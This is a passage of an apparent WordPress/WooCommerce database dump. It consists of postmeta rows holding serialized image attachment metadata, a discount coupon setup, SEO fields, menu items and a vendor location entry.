\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:23:\"cropped-l3-01-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-270\";a:4:{s:4:\"file\";s:25:\"cropped-l3-01-270x270.png\";s:5:\"width\";i:270;s:6:\"height\";i:270;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-192\";a:4:{s:4:\"file\";s:25:\"cropped-l3-01-192x192.png\";s:5:\"width\";i:192;s:6:\"height\";i:192;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-180\";a:4:{s:4:\"file\";s:25:\"cropped-l3-01-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"site_icon-32\";a:4:{s:4:\"file\";s:23:\"cropped-l3-01-32x32.png\";s:5:\"width\";i:32;s:6:\"height\";i:32;s:9:\"mime-type\";s:9:\"image/png\";}s:24:\"elementor_custom_150x150\";a:4:{s:4:\"file\";s:77:\"elementor/thumbs/cropped-l3-01-pljtgumj6ybra9yi5cgm6svo9aoa7xdp2d2exo8r4s.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6649,1220,'_wp_attached_file','2022/03/Artboard-4-8-1.png'),(6650,1220,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:920;s:6:\"height\";i:430;s:4:\"file\";s:26:\"2022/03/Artboard-4-8-1.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Artboard-4-8-1-300x140.png\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Artboard-4-8-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"Artboard-4-8-1-768x359.png\";s:5:\"width\";i:768;s:6:\"height\";i:359;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:26:\"Artboard-4-8-1-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:24:\"Artboard-4-8-1-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"Artboard-4-8-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:26:\"Artboard-4-8-1-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:24:\"Artboard-4-8-1-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"Artboard-4-8-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:24:\"Artboard-4-8-1-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:24:\"Artboard-4-8-1-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6651,1221,'_wp_attached_file','2022/03/Artboard-2-8-1.png'),(6652,1221,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:920;s:6:\"height\";i:430;s:4:\"file\";s:26:\"2022/03/Artboard-2-8-1.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Artboard-2-8-1-300x140.png\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Artboard-2-8-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"Artboard-2-8-1-768x359.png\";s:5:\"width\";i:768;s:6:\"height\";i:359;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:26:\"Artboard-2-8-1-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:24:\"Artboard-2-8-1-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"Artboard-2-8-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:26:\"Artboard-2-8-1-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:24:\"Artboard-2-8-1-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"Artboard-2-8-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:24:\"Artboard-2-8-1-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:24:\"Artboard-2-8-1-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6653,1222,'_wp_attached_file','2022/03/Artboard-3-8.png'),(6654,1222,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:920;s:6:\"height\";i:430;s:4:\"file\";s:24:\"2022/03/Artboard-3-8.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Artboard-3-8-300x140.png\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Artboard-3-8-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Artboard-3-8-768x359.png\";s:5:\"width\";i:768;s:6:\"height\";i:359;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:24:\"Artboard-3-8-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:22:\"Artboard-3-8-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:24:\"Artboard-3-8-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:24:\"Artboard-3-8-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:22:\"Artboard-3-8-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:24:\"Artboard-3-8-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:22:\"Artboard-3-8-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:22:\"Artboard-3-8-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6655,1223,'_wp_attached_file','2022/03/Artboard-1-8.png'),(6656,1223,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:920;s:6:\"height\";i:430;s:4:\"file\";s:24:\"2022/03/Artboard-1-8.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Artboard-1-8-300x140.png\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Artboard-1-8-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Artboard-1-8-768x359.png\";s:5:\"width\";i:768;s:6:\"height\";i:359;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:24:\"Artboard-1-8-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:22:\"Artboard-1-8-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:24:\"Artboard-1-8-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:24:\"Artboard-1-8-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:22:\"Artboard-1-8-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:24:\"Artboard-1-8-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:22:\"Artboard-1-8-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:22:\"Artboard-1-8-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6659,1224,'_wp_attached_file','2022/03/Untitled-2.png'),(6660,1224,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:920;s:6:\"height\";i:430;s:4:\"file\";s:22:\"2022/03/Untitled-2.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Untitled-2-300x140.png\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"Untitled-2-768x359.png\";s:5:\"width\";i:768;s:6:\"height\";i:359;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:22:\"Untitled-2-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:20:\"Untitled-2-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:22:\"Untitled-2-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:20:\"Untitled-2-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:20:\"Untitled-2-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:20:\"Untitled-2-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6670,1230,'_edit_lock','1646815758:1'),(6671,1230,'_edit_last','1'),(6672,1230,'discount_type','fixed_cart'),(6673,1230,'coupon_amount','34'),(6674,1230,'individual_use','no'),(6675,1230,'usage_limit','0'),(6676,1230,'usage_limit_per_user','0'),(6677,1230,'limit_usage_to_x_items','0'),(6678,1230,'usage_count','0'),(6679,1230,'date_expires','1648233000'),(6680,1230,'free_shipping','yes'),(6681,1230,'exclude_sale_items','no'),(6682,1230,'minimum_amount','400'),(6683,1230,'_pwb_coupon_restriction',''),(6684,1202,'is_vat_exempt','no'),(6685,1202,'_wcfmmp_user_location','17 Main Road'),(6686,1202,'_wcfmmp_user_location_lat','12.9129842'),(6687,1202,'_wcfmmp_user_location_lng','77.6421466'),(6688,1232,'_wp_attached_file','2022/03/8-1.jpg'),(6689,1232,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:15:\"2022/03/8-1.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"8-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"8-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:15:\"8-1-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:13:\"8-1-50x50.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:15:\"8-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:15:\"8-1-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:13:\"8-1-50x50.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:15:\"8-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:13:\"8-1-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:13:\"8-1-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(6692,1204,'_edit_last','1'),(6693,1204,'_aioseo_title','#post_title #separator_sa #site_title'),(6694,1204,'_aioseo_description','#post_content'),(6695,1204,'_aioseo_keywords',''),(6696,1204,'_aioseo_og_title',NULL),(6697,1204,'_aioseo_og_description',NULL),(6698,1204,'_aioseo_og_article_section',''),(6699,1204,'_aioseo_og_article_tags',''),(6700,1204,'_aioseo_twitter_title',NULL),(6701,1204,'_aioseo_twitter_description',NULL),(6702,1234,'wpforms_entries_count','6'),(6703,1238,'_menu_item_type','post_type'),(6704,1238,'_menu_item_menu_item_parent','0'),(6705,1238,'_menu_item_object_id','1204'),(6706,1238,'_menu_item_object','page'),(6707,1238,'_menu_item_target',''),(6708,1238,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(6709,1238,'_menu_item_xfn',''),(6710,1238,'_menu_item_url',''),(6713,1239,'_wp_attached_file','2022/03/121127525-cut-ripe-mangoes-and-space-for-text-on-color-background-top-view.webp'),(6714,1239,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:450;s:6:\"height\";i:300;s:4:\"file\";s:87:\"2022/03/121127525-cut-ripe-mangoes-and-space-for-text-on-color-background-top-view.webp\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:87:\"121127525-cut-ripe-mangoes-and-space-for-text-on-color-background-top-view-300x200.webp\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/webp\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:87:\"121127525-cut-ripe-mangoes-and-space-for-text-on-color-background-top-view-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:87:\"121127525-cut-ripe-mangoes-and-space-for-text-on-color-background-top-view-320x300.webp\";s:5:\"width\";i:320;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:85:\"121127525-cut-ripe-mangoes-and-space-for-text-on-color-background-top-view-50x33.webp\";s:5:\"width\";i:50;s:6:\"height\";i:33;s:9:\"mime-type\";s:10:\"image/webp\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:87:\"121127525-cut-ripe-mangoes-and-space-for-text-on-color-background-top-view-100x100.webp\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/webp\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:87:\"121127525-cut-ripe-mangoes-and-space-for-text-on-color-background-top-view-320x300.webp\";s:5:\"width\";i:320;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:85:\"121127525-cut-ripe-mangoes-and-space-for-text-on-color-background-top-view-50x33.webp\";s:5:\"width\";i:50;s:6:\"height\";i:33;s:9:\"mime-type\";s:10:\"image/webp\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:87:\"121127525-cut-ripe-mangoes-and-space-for-text-on-color-background-top-view-100x100.webp\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/webp\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:85:\"121127525-cut-ripe-mangoes-and-space-for-text-on-color-background-top-view-48x32.webp\";s:5:\"width\";i:48;s:6:\"height\";i:32;s:9:\"mime-type\";s:10:\"image/webp\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:85:\"121127525-cut-ripe-mangoes-and-space-for-text-on-color-background-top-view-48x32.webp\";s:5:\"width\";i:48;s:6:\"height\";i:32;s:9:\"mime-type\";s:10:\"image/webp\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6715,1241,'_wp_attached_file','2022/03/bg-01.png'),(6716,1241,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:8000;s:6:\"height\";i:4500;s:4:\"file\";s:17:\"2022/03/bg-01.png\";s:5:\"sizes\";a:14:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"bg-01-300x169.png\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:18:\"bg-01-1024x576.png\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"bg-01-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"bg-01-768x432.png\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:18:\"bg-01-1536x864.png\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:19:\"bg-01-2048x1152.png\";s:5:\"width\";i:2048;s:6:\"height\";i:1152;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:17:\"bg-01-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:15:\"bg-01-50x28.png\";s:5:\"width\";i:50;s:6:\"height\";i:28;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:17:\"bg-01-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:17:\"bg-01-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:15:\"bg-01-50x28.png\";s:5:\"width\";i:50;s:6:\"height\";i:28;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:17:\"bg-01-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:15:\"bg-01-48x27.png\";s:5:\"width\";i:48;s:6:\"height\";i:27;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:15:\"bg-01-48x27.png\";s:5:\"width\";i:48;s:6:\"height\";i:27;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6717,1243,'_wp_attached_file','2022/03/bg-01-2.png'),(6718,1243,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:8000;s:6:\"height\";i:4500;s:4:\"file\";s:19:\"2022/03/bg-01-2.png\";s:5:\"sizes\";a:14:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"bg-01-2-300x169.png\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:20:\"bg-01-2-1024x576.png\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"bg-01-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"bg-01-2-768x432.png\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:20:\"bg-01-2-1536x864.png\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:21:\"bg-01-2-2048x1152.png\";s:5:\"width\";i:2048;s:6:\"height\";i:1152;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnai